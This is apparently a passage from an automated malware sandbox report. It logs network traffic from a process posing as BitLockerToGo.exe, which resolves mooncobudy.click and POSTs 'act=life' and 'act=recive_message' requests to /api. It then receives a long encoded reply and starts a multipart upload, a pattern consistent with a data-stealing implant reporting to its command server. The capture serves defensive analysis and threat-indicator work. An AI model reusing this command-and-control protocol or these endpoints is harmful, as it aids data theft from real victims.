                                                                                              Dec 24, 2024 02:56:45.507719994 CET44349740104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:45.508941889 CET49740443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:45.509069920 CET49740443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:45.509099960 CET44349740104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:45.509165049 CET49740443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:45.509171963 CET44349740104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:46.573399067 CET44349740104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:46.573476076 CET44349740104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:46.573574066 CET49740443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:46.573859930 CET49740443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:46.573874950 CET44349740104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:47.396867037 CET49741443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:47.396910906 CET44349741104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:47.396985054 CET49741443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:47.397399902 CET49741443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:47.397416115 CET44349741104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:48.609816074 CET44349741104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:48.609961033 CET49741443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:48.611350060 CET49741443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:48.611356974 CET44349741104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:48.611587048 CET44349741104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:48.612926960 CET49741443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:48.613035917 CET49741443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:48.613044024 CET44349741104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:49.385776997 CET44349741104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:49.385871887 CET44349741104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:49.385920048 CET49741443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:49.386075020 CET49741443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:49.386086941 CET44349741104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:49.785052061 CET49742443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:49.785101891 CET44349742104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:49.785202026 CET49742443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:49.785507917 CET49742443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:49.785522938 CET44349742104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:51.052803040 CET44349742104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:51.052896976 CET49742443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:51.054141998 CET49742443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:51.054157019 CET44349742104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:51.054380894 CET44349742104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:51.064331055 CET49742443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:51.065076113 CET49742443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:51.065109015 CET44349742104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:51.065232038 CET49742443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:51.065262079 CET44349742104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:51.065392017 CET49742443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:51.065427065 CET44349742104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:51.065572977 CET49742443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:51.065597057 CET44349742104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:51.065773010 CET49742443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:51.065802097 CET44349742104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:51.065989971 CET49742443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:51.066025972 CET44349742104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:51.066035032 CET49742443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:51.066050053 CET44349742104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:51.066231012 CET49742443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:51.066252947 CET44349742104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:51.066281080 CET49742443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:51.066433907 CET49742443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:51.066462994 CET49742443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:51.107330084 CET44349742104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:51.107526064 CET49742443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:51.107544899 CET44349742104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:51.107568026 CET49742443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:51.107588053 CET44349742104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:56:51.107620955 CET49742443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:56:51.107636929 CET44349742104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:57:01.030649900 CET44349742104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:57:01.030761957 CET44349742104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:57:01.030816078 CET49742443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:57:01.030917883 CET49742443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:57:01.030936956 CET44349742104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:57:01.039874077 CET49749443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:57:01.039911032 CET44349749104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:57:01.039980888 CET49749443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:57:01.040329933 CET49749443192.168.2.4104.21.44.57
                                                                                              Dec 24, 2024 02:57:01.040342093 CET44349749104.21.44.57192.168.2.4
                                                                                              Dec 24, 2024 02:57:01.995878935 CET49749443192.168.2.4104.21.44.57
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 24, 2024 02:56:34.022145987 CET6079953192.168.2.41.1.1.1
                                                                                              Dec 24, 2024 02:56:34.346987009 CET53607991.1.1.1192.168.2.4
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Dec 24, 2024 02:56:34.022145987 CET192.168.2.41.1.1.10xf0b9Standard query (0)mooncobudy.clickA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Dec 24, 2024 02:56:34.346987009 CET1.1.1.1192.168.2.40xf0b9No error (0)mooncobudy.click104.21.44.57A (IP address)IN (0x0001)false
                                                                                              Dec 24, 2024 02:56:34.346987009 CET1.1.1.1192.168.2.40xf0b9No error (0)mooncobudy.click172.67.195.220A (IP address)IN (0x0001)false
                                                                                              • mooncobudy.click
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.449736104.21.44.574437680C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-24 01:56:35 UTC263OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: mooncobudy.click
                                                                                              2024-12-24 01:56:35 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                              Data Ascii: act=life
                                                                                              2024-12-24 01:56:36 UTC1122INHTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Dec 2024 01:56:36 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=l9dkk5oto55om8jneqldq2ec9l; expires=Fri, 18 Apr 2025 19:43:15 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jh%2BEOT%2Fqpvcy9HM2811HzJxuXlwaKX%2FLlfFxzdPbDouSItwQMPqbSYwXOd5qdDVIj9hHnzVcqL1148wAxOKaHIOfOYmZRo8tipY3sHk9f8s4PqVQVgX6QU1PZ7KzJY8g575e"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f6cf9cd18f5c351-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1568&rtt_var=589&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=907&delivery_rate=1856325&cwnd=184&unsent_bytes=0&cid=94dd16b90c08eb3c&ts=1046&x=0"
                                                                                              2024-12-24 01:56:36 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                              Data Ascii: 2ok
                                                                                              2024-12-24 01:56:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.449737104.21.44.574437680C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-24 01:56:37 UTC264OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 48
                                                                                              Host: mooncobudy.click
                                                                                              2024-12-24 01:56:37 UTC48OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4a 77 71 75 6c 6e 2d 2d 32 31 31 32 59 54 26 6a 3d
                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=Jwquln--2112YT&j=
                                                                                              2024-12-24 01:56:38 UTC1122INHTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Dec 2024 01:56:38 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=n4rc3c1f36v26caq72p3d5pmah; expires=Fri, 18 Apr 2025 19:43:17 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tPdLEr%2Fwatmfi4LtzFbWydBEdbvk%2F2MqbTXBemdbh4RyVQM7oUSIiyR32HOVEe65zVTeH3OSCzldmA7ueH819M2tGorraXggfJFZsShzjk43ZR5RG%2BPN3Z9lIOBmulc1Czm8"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f6cf9da3d7178d3-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1926&min_rtt=1926&rtt_var=722&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=948&delivery_rate=1516095&cwnd=210&unsent_bytes=0&cid=e8ad17240d3b0d06&ts=1047&x=0"
                                                                                              2024-12-24 01:56:38 UTC247INData Raw: 34 39 31 63 0d 0a 7a 33 41 67 31 34 36 69 2f 4a 57 66 52 71 32 68 75 6f 6c 63 6d 5a 74 2f 46 62 2f 73 56 56 50 43 6e 48 68 46 32 75 56 55 33 52 79 30 55 6c 62 31 74 4a 62 51 74 2b 77 6a 6a 35 76 4f 2b 79 6e 38 74 31 31 30 32 38 35 76 4e 61 50 77 43 79 44 32 78 79 4b 77 50 76 55 57 51 62 76 39 78 39 43 33 2b 6a 36 50 6d 2b 48 79 66 76 7a 31 58 53 2b 64 69 54 38 78 6f 2f 41 61 4a 4c 47 4b 4a 4c 46 2f 70 78 78 48 76 2b 76 42 6d 50 54 7a 4b 38 6a 45 33 2b 67 32 39 2f 49 53 66 64 4c 4f 65 58 47 6e 35 6c 70 2f 2b 4b 67 78 71 58 32 43 45 56 4f 38 72 4e 2f 51 37 72 30 6a 77 34 4f 41 71 7a 33 38 2b 52 4e 7a 32 34 63 39 4f 36 72 34 47 79 47 77 6c 54 32 37 64 4b 63 53 52 4c 37 68 79 49 7a 35 2b 53 7a 44 77 74 58 6f 66 72 57 35 47 6d 2b 64 31
                                                                                              Data Ascii: 491cz3Ag146i/JWfRq2huolcmZt/Fb/sVVPCnHhF2uVU3Ry0Ulb1tJbQt+wjj5vO+yn8t110285vNaPwCyD2xyKwPvUWQbv9x9C3+j6Pm+Hyfvz1XS+diT8xo/AaJLGKJLF/pxxHv+vBmPTzK8jE3+g29/ISfdLOeXGn5lp/+KgxqX2CEVO8rN/Q7r0jw4OAqz38+RNz24c9O6r4GyGwlT27dKcSRL7hyIz5+SzDwtXofrW5Gm+d1
                                                                                              2024-12-24 01:56:38 UTC1369INData Raw: 6e 64 69 6b 76 30 4c 4e 71 32 4b 4a 72 6b 2b 73 6c 78 62 39 65 76 4d 33 71 2b 39 4c 4d 50 4e 33 65 67 78 2f 50 67 64 5a 64 4b 4f 4e 44 6d 6f 2b 68 41 6f 74 34 67 34 74 58 6d 6c 47 30 57 36 36 38 69 59 2b 50 35 6b 67 59 50 66 38 33 36 6a 75 54 31 6e 33 6f 30 6a 50 4c 47 2b 42 57 6d 68 78 7a 47 7a 50 76 56 53 52 4c 76 74 7a 5a 37 6c 39 53 2f 45 78 73 72 67 4e 2f 62 30 48 58 72 58 67 54 51 78 70 2f 51 51 4b 4c 4b 44 4f 37 4a 34 72 52 49 43 2b 36 7a 48 68 72 65 6c 5a 4f 7a 47 79 4f 77 79 37 62 73 6e 4e 38 4c 41 4c 6e 47 6e 38 6c 70 2f 2b 49 38 7a 76 48 32 6d 48 55 47 39 35 39 4b 65 35 66 73 70 79 74 48 65 37 6a 44 78 2b 67 39 39 30 34 67 30 4f 4b 76 33 48 79 43 38 78 33 6a 2f 65 62 56 53 47 76 58 4e 7a 5a 58 37 39 7a 50 50 67 38 65 6c 4a 37 76 2b 45 54 65 46
                                                                                              Data Ascii: ndikv0LNq2KJrk+slxb9evM3q+9LMPN3egx/PgdZdKONDmo+hAot4g4tXmlG0W668iY+P5kgYPf836juT1n3o0jPLG+BWmhxzGzPvVSRLvtzZ7l9S/ExsrgN/b0HXrXgTQxp/QQKLKDO7J4rRIC+6zHhrelZOzGyOwy7bsnN8LALnGn8lp/+I8zvH2mHUG959Ke5fspytHe7jDx+g9904g0OKv3HyC8x3j/ebVSGvXNzZX79zPPg8elJ7v+ETeF
                                                                                              2024-12-24 01:56:38 UTC1369INData Raw: 79 2b 56 47 65 2f 6e 33 62 6e 50 6f 63 52 56 72 62 6d 67 71 76 30 38 79 72 49 31 5a 6a 30 63 4f 4b 35 47 6e 75 64 31 6e 63 38 6f 66 59 63 4e 62 65 4b 4e 62 46 77 6f 68 64 4e 76 65 7a 41 6b 2f 4c 35 4c 38 54 41 31 65 38 73 38 66 6b 56 63 74 79 45 50 58 48 75 76 68 30 2f 2b 4e 39 32 6a 6d 6d 6d 55 48 65 32 34 73 36 5a 34 62 30 37 67 64 71 59 37 44 4b 37 6f 56 31 36 31 59 73 79 50 71 48 30 46 43 4b 79 69 7a 36 78 66 62 38 64 52 72 58 67 79 4a 54 36 38 79 44 48 79 74 50 67 4f 50 76 34 46 7a 65 54 7a 6a 41 70 34 4b 5a 61 45 37 2b 4c 4f 37 41 38 6d 42 46 4d 75 2b 76 57 33 75 69 7a 50 59 2f 45 31 4b 74 6d 75 2f 55 55 64 39 61 45 4d 7a 47 6e 38 78 38 6b 76 34 51 37 75 48 53 6a 46 55 61 35 35 63 32 59 39 2f 6f 67 79 74 48 64 34 6a 4c 33 75 56 4d 33 32 70 5a 33 61
                                                                                              Data Ascii: y+VGe/n3bnPocRVrbmgqv08yrI1Zj0cOK5Gnud1nc8ofYcNbeKNbFwohdNvezAk/L5L8TA1e8s8fkVctyEPXHuvh0/+N92jmmmUHe24s6Z4b07gdqY7DK7oV161YsyPqH0FCKyiz6xfb8dRrXgyJT68yDHytPgOPv4FzeTzjAp4KZaE7+LO7A8mBFMu+vW3uizPY/E1Ktmu/UUd9aEMzGn8x8kv4Q7uHSjFUa55c2Y9/ogytHd4jL3uVM32pZ3a
                                                                                              2024-12-24 01:56:38 UTC1369INData Raw: 72 2b 4e 39 32 74 6e 65 2f 48 45 79 38 34 63 61 57 38 50 4d 70 78 4d 58 54 37 44 6e 39 39 42 56 36 32 49 30 32 4e 61 72 73 47 53 79 79 69 6a 7a 2f 4d 4f 30 56 57 76 57 30 67 4c 6e 37 31 44 54 55 30 63 36 72 49 62 58 67 58 58 44 52 7a 6d 39 78 6f 2f 45 54 4b 4c 43 50 4f 62 42 36 6f 78 52 45 75 4f 6e 50 6c 4f 58 31 4b 73 4c 49 31 2b 41 73 2b 2f 51 5a 65 39 6d 47 50 44 76 67 73 46 6f 67 6f 4d 64 75 2f 30 75 67 48 55 4b 32 2b 6f 43 42 75 65 52 6b 79 4d 2b 59 73 33 37 33 39 78 31 34 30 59 49 38 4f 61 48 79 46 43 43 39 6a 6a 36 33 62 4b 77 57 53 72 54 69 7a 35 2f 7a 2b 43 48 4c 78 4e 7a 74 4d 62 75 33 58 58 44 46 7a 6d 39 78 6a 39 6b 76 5a 5a 6d 39 64 71 41 77 74 46 4a 46 75 61 79 59 33 76 76 2b 4b 4d 66 4d 33 75 49 79 38 66 41 57 65 39 61 4b 4f 7a 69 6c 2b 42
                                                                                              Data Ascii: r+N92tne/HEy84caW8PMpxMXT7Dn99BV62I02NarsGSyyijz/MO0VWvW0gLn71DTU0c6rIbXgXXDRzm9xo/ETKLCPObB6oxREuOnPlOX1KsLI1+As+/QZe9mGPDvgsFogoMdu/0ugHUK2+oCBueRkyM+Ys3739x140YI8OaHyFCC9jj63bKwWSrTiz5/z+CHLxNztMbu3XXDFzm9xj9kvZZm9dqAwtFJFuayY3vv+KMfM3uIy8fAWe9aKOzil+B
                                                                                              2024-12-24 01:56:38 UTC1369INData Raw: 4a 4c 68 33 76 78 78 50 75 75 54 49 6c 2f 62 35 49 63 4c 46 31 4f 45 2f 2f 50 63 54 66 35 33 41 64 7a 61 34 76 6b 4a 6e 6d 5a 63 74 72 57 69 67 4d 30 2b 36 72 4e 2f 51 37 72 30 6a 77 34 4f 41 71 7a 66 70 2f 52 42 6c 31 49 6b 35 50 71 50 73 47 79 71 7a 6c 54 47 77 65 71 6f 65 52 4c 72 71 77 5a 76 39 38 53 50 4b 79 4e 66 6e 66 72 57 35 47 6d 2b 64 31 6e 63 66 71 2b 30 4e 4a 4c 61 4d 49 4b 51 2b 73 6c 78 62 39 65 76 4d 33 71 2b 39 4a 38 54 49 33 4f 73 79 2b 2f 30 51 64 38 2b 42 4d 44 61 70 39 51 67 74 76 34 41 39 74 33 57 69 46 46 43 35 34 74 4b 62 35 65 39 6b 67 59 50 66 38 33 36 6a 75 53 74 77 7a 5a 34 30 63 35 48 6f 47 54 47 7a 69 6a 72 2f 59 65 4d 4c 41 72 4c 67 67 4d 61 33 2b 79 76 47 77 4e 66 71 4e 2f 66 30 47 48 37 59 6a 7a 45 31 71 76 51 61 49 62 36
                                                                                              Data Ascii: JLh3vxxPuuTIl/b5IcLF1OE//PcTf53Adza4vkJnmZctrWigM0+6rN/Q7r0jw4OAqzfp/RBl1Ik5PqPsGyqzlTGweqoeRLrqwZv98SPKyNfnfrW5Gm+d1ncfq+0NJLaMIKQ+slxb9evM3q+9J8TI3Osy+/0Qd8+BMDap9Qgtv4A9t3WiFFC54tKb5e9kgYPf836juStwzZ40c5HoGTGzijr/YeMLArLggMa3+yvGwNfqN/f0GH7YjzE1qvQaIb6
                                                                                              2024-12-24 01:56:38 UTC1369INData Raw: 2b 30 56 54 76 57 30 67 4a 33 77 2f 69 58 46 79 74 54 6b 4f 66 2f 72 46 33 44 50 6a 7a 59 36 72 66 49 61 4b 72 57 4e 4e 37 5a 7a 6f 52 39 46 73 75 50 46 33 72 6d 39 49 39 65 44 67 4b 73 66 39 76 49 52 4c 49 66 4f 4b 48 2b 35 76 68 30 72 2b 4e 39 32 76 33 53 6f 47 45 2b 32 34 38 4f 4d 39 76 73 32 7a 38 37 53 2b 54 54 77 2f 42 42 36 30 49 30 78 4e 36 76 79 43 43 36 34 68 44 33 2f 4d 4f 30 56 57 76 57 30 67 4c 33 67 36 79 37 49 7a 38 37 67 50 2f 6a 76 45 47 65 64 77 48 63 67 70 2b 39 61 66 36 36 58 49 62 68 68 34 77 73 43 73 75 43 41 78 72 66 37 4c 63 6e 45 33 75 55 73 2f 76 38 53 65 4e 53 48 4d 7a 6d 6a 2f 68 34 6a 76 34 49 31 73 33 57 71 45 55 32 78 35 63 36 58 2b 4c 31 71 6a 38 54 41 71 32 61 37 32 41 5a 30 30 59 4e 33 4c 75 37 6e 57 69 43 30 78 32 37 2f
                                                                                              Data Ascii: +0VTvW0gJ3w/iXFytTkOf/rF3DPjzY6rfIaKrWNN7ZzoR9FsuPF3rm9I9eDgKsf9vIRLIfOKH+5vh0r+N92v3SoGE+248OM9vs2z87S+TTw/BB60I0xN6vyCC64hD3/MO0VWvW0gL3g6y7Iz87gP/jvEGedwHcgp+9af66XIbhh4wsCsuCAxrf7LcnE3uUs/v8SeNSHMzmj/h4jv4I1s3WqEU2x5c6X+L1qj8TAq2a72AZ00YN3Lu7nWiC0x27/
                                                                                              2024-12-24 01:56:38 UTC1369INData Raw: 4b 2b 2b 73 57 5a 34 62 38 52 7a 4d 33 57 37 43 69 37 35 69 49 35 6e 59 45 74 63 66 6a 48 41 32 65 2f 69 33 62 6e 50 72 67 56 51 72 4c 32 31 70 6e 37 37 43 2f 43 7a 2f 72 6b 4f 65 33 36 45 6e 54 4d 68 33 73 36 72 62 35 55 5a 37 2b 66 64 75 63 2b 67 68 56 55 74 73 50 44 6a 2f 36 39 61 6f 2f 45 7a 71 74 6d 75 38 64 64 5a 64 36 65 4e 44 36 78 77 46 70 2f 6f 62 6c 32 74 47 69 71 41 6b 47 6a 35 38 32 53 35 73 4e 6b 6c 35 65 4b 75 57 79 70 71 77 49 33 77 72 46 35 63 61 47 2b 51 68 36 68 78 79 44 2f 4a 76 39 63 41 71 65 73 6d 4e 36 77 2f 6a 62 64 78 64 76 39 50 62 7a 48 49 31 44 4c 68 44 41 68 70 2b 6b 56 5a 2f 62 48 4f 66 38 6d 6c 46 4a 4c 73 76 66 52 69 50 72 74 49 34 2f 38 6c 71 73 6d 75 36 46 64 51 74 36 41 4f 54 61 32 37 31 63 41 72 6f 30 78 72 33 6d 36 48
                                                                                              Data Ascii: K++sWZ4b8RzM3W7Ci75iI5nYEtcfjHA2e/i3bnPrgVQrL21pn77C/Cz/rkOe36EnTMh3s6rb5UZ7+fduc+ghVUtsPDj/69ao/Ezqtmu8ddZd6eND6xwFp/obl2tGiqAkGj582S5sNkl5eKuWypqwI3wrF5caG+Qh6hxyD/Jv9cAqesmN6w/jbdxdv9PbzHI1DLhDAhp+kVZ/bHOf8mlFJLsvfRiPrtI4/8lqsmu6FdQt6AOTa271cAro0xr3m6H
                                                                                              2024-12-24 01:56:38 UTC1369INData Raw: 4f 6c 66 66 36 4e 4e 6e 59 6c 4f 4d 39 34 65 4d 6a 53 66 61 43 4d 54 61 36 2b 52 77 42 6d 4d 64 34 2f 33 48 74 53 6e 76 31 70 49 43 68 75 62 30 38 6a 35 75 59 33 6a 33 31 39 78 70 68 7a 4d 4d 66 45 70 72 45 57 41 75 2f 6b 6e 53 4c 65 62 30 44 53 62 6a 67 67 4e 43 33 2b 32 53 58 6b 35 61 72 4f 75 71 35 52 53 65 50 31 57 4a 69 39 36 35 49 4f 50 61 65 64 71 6b 2b 39 55 41 4d 39 66 36 41 78 72 65 36 4a 39 33 52 33 75 67 6f 2b 4c 34 6a 53 66 71 41 4d 44 43 32 37 67 30 6f 68 72 6b 6a 76 48 43 6a 46 56 53 6b 72 49 37 65 2b 4c 31 38 39 6f 4f 51 71 77 47 31 75 51 55 33 68 63 34 43 4d 71 37 77 48 54 47 70 79 68 47 78 65 61 77 45 55 71 4c 6a 67 4e 43 33 2b 32 53 58 6b 5a 61 72 4f 75 71 35 52 53 65 50 31 57 4a 69 39 36 35 49 4f 50 61 65 64 71 6b 2b 39 55 41 4d 39 66
                                                                                              Data Ascii: Olff6NNnYlOM94eMjSfaCMTa6+RwBmMd4/3HtSnv1pIChub08j5uY3j319xphzMMfEprEWAu/knSLeb0DSbjggNC3+2SXk5arOuq5RSeP1WJi965IOPaedqk+9UAM9f6Axre6J93R3ugo+L4jSfqAMDC27g0ohrkjvHCjFVSkrI7e+L189oOQqwG1uQU3hc4CMq7wHTGpyhGxeawEUqLjgNC3+2SXkZarOuq5RSeP1WJi965IOPaedqk+9UAM9f
                                                                                              2024-12-24 01:56:38 UTC1369INData Raw: 2b 6a 4c 4d 67 35 61 72 4d 72 75 68 58 58 62 58 6e 6a 6f 2b 70 37 49 64 50 62 2f 48 65 50 39 77 37 55 6f 43 74 4f 62 51 6b 2f 6a 36 61 4d 6e 4e 31 71 73 68 74 65 42 64 59 5a 33 57 5a 48 2f 67 37 46 70 2f 2b 4d 41 31 72 57 79 72 45 56 53 32 71 2f 36 67 32 75 38 6a 33 38 43 61 32 6a 50 2f 37 77 68 30 7a 59 6b 4a 44 34 33 73 48 54 65 37 78 51 65 70 66 61 30 63 52 66 57 69 67 49 61 33 70 57 54 69 30 64 2f 37 50 62 75 33 58 58 75 64 31 6e 63 38 73 76 6b 4b 4a 50 53 41 4c 4c 67 2b 73 6c 78 62 39 66 71 41 78 71 53 7a 5a 4e 32 44 67 4b 74 35 39 66 51 63 64 4e 4f 4e 4a 53 4f 6d 2f 51 77 6b 2f 37 6b 49 6b 6d 79 71 41 6b 48 33 33 63 32 61 34 65 67 6e 33 38 54 6d 31 52 50 70 2f 67 31 30 6e 36 49 77 50 4b 7a 41 4a 42 43 70 67 43 62 39 57 4b 34 45 51 66 57 69 67 49 61
                                                                                              Data Ascii: +jLMg5arMruhXXbXnjo+p7IdPb/HeP9w7UoCtObQk/j6aMnN1qshteBdYZ3WZH/g7Fp/+MA1rWyrEVS2q/6g2u8j38Ca2jP/7wh0zYkJD43sHTe7xQepfa0cRfWigIa3pWTi0d/7Pbu3XXud1nc8svkKJPSALLg+slxb9fqAxqSzZN2DgKt59fQcdNONJSOm/Qwk/7kIkmyqAkH33c2a4egn38Tm1RPp/g10n6IwPKzAJBCpgCb9WK4EQfWigIa


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.449738104.21.44.574437680C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-24 01:56:40 UTC277OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=DGI840PD1ZFG7
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 18134
                                                                                              Host: mooncobudy.click
